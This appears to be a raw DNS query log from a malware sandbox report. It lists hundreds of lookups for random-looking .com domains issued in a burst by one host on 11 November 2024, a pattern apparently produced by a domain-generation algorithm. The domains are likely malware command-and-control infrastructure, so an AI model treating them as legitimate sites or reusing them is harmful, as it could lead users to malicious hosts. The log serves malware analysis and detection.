                                                                                                                                                                                                              Nov 11, 2024 18:34:05.142995119 CET192.168.2.81.1.1.10x7bb3Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.144262075 CET192.168.2.81.1.1.10x49f2Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.144752026 CET192.168.2.81.1.1.10x17d9Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.144939899 CET192.168.2.81.1.1.10x6b65Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.145052910 CET192.168.2.81.1.1.10x90dbStandard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.146047115 CET192.168.2.81.1.1.10x2aafStandard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.146585941 CET192.168.2.81.1.1.10xc6b3Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.300460100 CET192.168.2.81.1.1.10x1936Standard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.770462990 CET192.168.2.81.1.1.10xe4feStandard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.770771980 CET192.168.2.81.1.1.10xb7e9Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.770823956 CET192.168.2.81.1.1.10x9e5aStandard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.771269083 CET192.168.2.81.1.1.10x8c0Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.771766901 CET192.168.2.81.1.1.10x3aa0Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.776046991 CET192.168.2.81.1.1.10x12f7Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.801872969 CET192.168.2.81.1.1.10xbb9eStandard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.806886911 CET192.168.2.81.1.1.10x36adStandard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.811335087 CET192.168.2.81.1.1.10x15ecStandard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.812119007 CET192.168.2.81.1.1.10x82e9Standard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.812119007 CET192.168.2.81.1.1.10xfe47Standard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.827297926 CET192.168.2.81.1.1.10xe80bStandard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.827497959 CET192.168.2.81.1.1.10xc962Standard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.830363035 CET192.168.2.81.1.1.10xebb6Standard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.831289053 CET192.168.2.81.1.1.10xc521Standard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.835860968 CET192.168.2.81.1.1.10xf228Standard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.842432022 CET192.168.2.81.1.1.10x137dStandard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.846596956 CET192.168.2.81.1.1.10x88d5Standard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.857167959 CET192.168.2.81.1.1.10xb91bStandard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.861213923 CET192.168.2.81.1.1.10x48fStandard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.865056038 CET192.168.2.81.1.1.10xbba4Standard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.866230011 CET192.168.2.81.1.1.10xf2a0Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.866677999 CET192.168.2.81.1.1.10x9f2dStandard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.867872953 CET192.168.2.81.1.1.10x8c74Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.868402004 CET192.168.2.81.1.1.10x15e5Standard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.869740009 CET192.168.2.81.1.1.10x37a1Standard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.871570110 CET192.168.2.81.1.1.10x1ac3Standard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.872549057 CET192.168.2.81.1.1.10xe869Standard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.875861883 CET192.168.2.81.1.1.10xc6dcStandard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.877954960 CET192.168.2.81.1.1.10x1d76Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.878146887 CET192.168.2.81.1.1.10x3913Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.880343914 CET192.168.2.81.1.1.10x4f7aStandard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.881010056 CET192.168.2.81.1.1.10xf43dStandard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.881129026 CET192.168.2.81.1.1.10x77d9Standard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.881643057 CET192.168.2.81.1.1.10x69daStandard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.882489920 CET192.168.2.81.1.1.10xad0Standard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.884757996 CET192.168.2.81.1.1.10xa8aaStandard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.885008097 CET192.168.2.81.1.1.10xdd7Standard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.886547089 CET192.168.2.81.1.1.10xa284Standard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.892029047 CET192.168.2.81.1.1.10x84e5Standard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.901813984 CET192.168.2.81.1.1.10x6d11Standard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.913614035 CET192.168.2.81.1.1.10x728fStandard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.914400101 CET192.168.2.81.1.1.10x5f13Standard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.914846897 CET192.168.2.81.1.1.10x6d99Standard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.915016890 CET192.168.2.81.1.1.10xd837Standard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.917371988 CET192.168.2.81.1.1.10x60a1Standard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.917716026 CET192.168.2.81.1.1.10xb0c0Standard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.918118000 CET192.168.2.81.1.1.10x437eStandard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.924179077 CET192.168.2.81.1.1.10x7d65Standard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.924263954 CET192.168.2.81.1.1.10x4945Standard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.924747944 CET192.168.2.81.1.1.10x9f28Standard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.924947023 CET192.168.2.81.1.1.10xffaaStandard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.929414988 CET192.168.2.81.1.1.10x7e72Standard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.930365086 CET192.168.2.81.1.1.10x8f86Standard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.930552006 CET192.168.2.81.1.1.10x8f38Standard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.930572987 CET192.168.2.81.1.1.10x6201Standard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.931065083 CET192.168.2.81.1.1.10xf01eStandard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.931474924 CET192.168.2.81.1.1.10x91aeStandard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.931679010 CET192.168.2.81.1.1.10xb23Standard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.931802988 CET192.168.2.81.1.1.10xad9bStandard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.931879044 CET192.168.2.81.1.1.10x48d4Standard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.932009935 CET192.168.2.81.1.1.10x219cStandard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.932075977 CET192.168.2.81.1.1.10x6c6aStandard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.932194948 CET192.168.2.81.1.1.10xf67dStandard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:05.932437897 CET192.168.2.81.1.1.10x13fbStandard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:06.051239014 CET192.168.2.81.1.1.10x2a6cStandard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:06.053092003 CET192.168.2.81.1.1.10x4524Standard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:06.054693937 CET192.168.2.81.1.1.10xde62Standard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:06.055141926 CET192.168.2.81.1.1.10xbcdbStandard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:06.055639982 CET192.168.2.81.1.1.10xf514Standard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.703726053 CET192.168.2.81.1.1.10x9621Standard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.709765911 CET192.168.2.81.1.1.10xdfe7Standard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.714807987 CET192.168.2.81.1.1.10x35d3Standard query (0)pumyliq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.722862959 CET192.168.2.81.1.1.10x22e1Standard query (0)lysysyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.724086046 CET192.168.2.81.1.1.10xb30fStandard query (0)qekynog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.737891912 CET192.168.2.81.1.1.10x57d8Standard query (0)vonykuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.743200064 CET192.168.2.81.1.1.10x67abStandard query (0)vopypec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.743783951 CET192.168.2.81.1.1.10x148aStandard query (0)lykynon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.748555899 CET192.168.2.81.1.1.10xca9dStandard query (0)ganykuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.755696058 CET192.168.2.81.1.1.10x26aaStandard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.755928040 CET192.168.2.81.1.1.10x861fStandard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.794295073 CET192.168.2.81.1.1.10xe717Standard query (0)qexyhap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.798870087 CET192.168.2.81.1.1.10xbb36Standard query (0)qetylip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.798911095 CET192.168.2.81.1.1.10x164fStandard query (0)qebyqeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.800888062 CET192.168.2.81.1.1.10xae87Standard query (0)gaqykus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.802038908 CET192.168.2.81.1.1.10x4972Standard query (0)qexynol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.802679062 CET192.168.2.81.1.1.10xab87Standard query (0)pufypeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.803550959 CET192.168.2.81.1.1.10x141fStandard query (0)vowykuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.804238081 CET192.168.2.81.1.1.10xe64Standard query (0)qegysyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.805500031 CET192.168.2.81.1.1.10x2c8cStandard query (0)lygysen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.806296110 CET192.168.2.81.1.1.10x4d30Standard query (0)purylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.807847023 CET192.168.2.81.1.1.10x95cStandard query (0)gacynow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.808420897 CET192.168.2.81.1.1.10xce46Standard query (0)lyrylix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.809267044 CET192.168.2.81.1.1.10x4f7Standard query (0)vocymak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.809858084 CET192.168.2.81.1.1.10x91a5Standard query (0)gahydyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.811753035 CET192.168.2.81.1.1.10x90d6Standard query (0)pumywug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.813304901 CET192.168.2.81.1.1.10xea95Standard query (0)qeqyrug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.825875998 CET192.168.2.81.1.1.10xd7b4Standard query (0)lykyfud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.826457024 CET192.168.2.81.1.1.10xec0fStandard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.827162981 CET192.168.2.81.1.1.10x17bcStandard query (0)purytov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.827452898 CET192.168.2.81.1.1.10xf4ceStandard query (0)lyxygax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.827589035 CET192.168.2.81.1.1.10x5e24Standard query (0)vofycyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.827869892 CET192.168.2.81.1.1.10x8774Standard query (0)puzygop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.829680920 CET192.168.2.81.1.1.10xd27cStandard query (0)lymywun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.829885960 CET192.168.2.81.1.1.10xaad4Standard query (0)gadycew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.830128908 CET192.168.2.81.1.1.10x55a8Standard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.833055973 CET192.168.2.81.1.1.10xf4b5Standard query (0)qebykul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.833592892 CET192.168.2.81.1.1.10xc8cdStandard query (0)vopyzot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.834233046 CET192.168.2.81.1.1.10x7148Standard query (0)gatyzoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.834705114 CET192.168.2.81.1.1.10xb000Standard query (0)galyfis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.836560011 CET192.168.2.81.1.1.10x7df3Standard query (0)lysyxar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.843390942 CET192.168.2.81.1.1.10x4142Standard query (0)ganyqyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.843789101 CET192.168.2.81.1.1.10xef51Standard query (0)pupyxal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.844122887 CET192.168.2.81.1.1.10x4779Standard query (0)puvymaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.844602108 CET192.168.2.81.1.1.10xdf9cStandard query (0)qekyfiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.846277952 CET192.168.2.81.1.1.10x324Standard query (0)lyvymej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.847033978 CET192.168.2.81.1.1.10x7f19Standard query (0)vojyduf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.847218990 CET192.168.2.81.1.1.10x35f2Standard query (0)vocyjet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.853552103 CET192.168.2.81.1.1.10x5a28Standard query (0)vowyrif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.853735924 CET192.168.2.81.1.1.10x5480Standard query (0)pupypep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.854193926 CET192.168.2.81.1.1.10xae4eStandard query (0)volygoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.854382038 CET192.168.2.81.1.1.10x18c9Standard query (0)puvyjyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.854507923 CET192.168.2.81.1.1.10xf999Standard query (0)vonyqym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.854804039 CET192.168.2.81.1.1.10x2841Standard query (0)qegyvuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.855664968 CET192.168.2.81.1.1.10xb91eStandard query (0)qetytav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.855681896 CET192.168.2.81.1.1.10x9fedStandard query (0)lyrytod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.855952024 CET192.168.2.81.1.1.10x6699Standard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.856611967 CET192.168.2.81.1.1.10x1469Standard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.857275963 CET192.168.2.81.1.1.10x3777Standard query (0)qedyxel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.858649015 CET192.168.2.81.1.1.10x375dStandard query (0)gahyvuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.859077930 CET192.168.2.81.1.1.10xdc77Standard query (0)pufycyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.859440088 CET192.168.2.81.1.1.10x4e92Standard query (0)pujyduv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:07.860905886 CET192.168.2.81.1.1.10xf2d5Standard query (0)gaqyrib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.479538918 CET192.168.2.81.1.1.10x5871Standard query (0)vojypat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.486742020 CET192.168.2.81.1.1.10x6cfdStandard query (0)qetykyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.487540960 CET192.168.2.81.1.1.10x5c13Standard query (0)vocybuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.501358986 CET192.168.2.81.1.1.10x89aeStandard query (0)vonymoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.501727104 CET192.168.2.81.1.1.10x7c62Standard query (0)puvybuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.502567053 CET192.168.2.81.1.1.10x5238Standard query (0)qegytop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.519474030 CET192.168.2.81.1.1.10x51f3Standard query (0)gahypoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.519723892 CET192.168.2.81.1.1.10x80f3Standard query (0)qebyniv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.519973040 CET192.168.2.81.1.1.10xc3dbStandard query (0)lykyser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.523566008 CET192.168.2.81.1.1.10x7ebStandard query (0)gatykyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.524878025 CET192.168.2.81.1.1.10x53dcStandard query (0)pujypal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.526012897 CET192.168.2.81.1.1.10x8a11Standard query (0)puryjeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.543371916 CET192.168.2.81.1.1.10xd03dStandard query (0)lykyvyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.543418884 CET192.168.2.81.1.1.10xb777Standard query (0)qebyhag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.545770884 CET192.168.2.81.1.1.10xf83bStandard query (0)ganyhab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.547274113 CET192.168.2.81.1.1.10x126cStandard query (0)qekyvup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.547509909 CET192.168.2.81.1.1.10xd912Standard query (0)vopyrik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.549329996 CET192.168.2.81.1.1.10xda30Standard query (0)vonyjef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.549791098 CET192.168.2.81.1.1.10x5edaStandard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.552922010 CET192.168.2.81.1.1.10x9e70Standard query (0)galyvuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.553375959 CET192.168.2.81.1.1.10xdd7fStandard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.554821014 CET192.168.2.81.1.1.10xe108Standard query (0)qedytoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.557312965 CET192.168.2.81.1.1.10x87bdStandard query (0)pumyjev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.568737984 CET192.168.2.81.1.1.10x60e8Standard query (0)gadypah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.572643042 CET192.168.2.81.1.1.10xf262Standard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.573024988 CET192.168.2.81.1.1.10xa4c3Standard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.573024988 CET192.168.2.81.1.1.10xd79cStandard query (0)pumymap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.585411072 CET192.168.2.81.1.1.10xe6afStandard query (0)lymymax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.593684912 CET192.168.2.81.1.1.10x7e58Standard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.595535994 CET192.168.2.81.1.1.10x28d2Standard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.595712900 CET192.168.2.81.1.1.10xc15bStandard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.595741987 CET192.168.2.81.1.1.10xba18Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.595901012 CET192.168.2.81.1.1.10x6916Standard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.595940113 CET192.168.2.81.1.1.10x4df3Standard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596086025 CET192.168.2.81.1.1.10xeb3dStandard query (0)volybut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596117973 CET192.168.2.81.1.1.10xd236Standard query (0)pufyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596263885 CET192.168.2.81.1.1.10x8c97Standard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596323967 CET192.168.2.81.1.1.10x9f6Standard query (0)qeqykyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596431017 CET192.168.2.81.1.1.10x87aeStandard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596601009 CET192.168.2.81.1.1.10xa3f9Standard query (0)lyxynir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596615076 CET192.168.2.81.1.1.10x18d7Standard query (0)lyrywur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:34:08.596771955 CET192.168.2.81.1.1.10x8e51Standard query (0)gahyces.comA (IP address)IN (0x0001)false
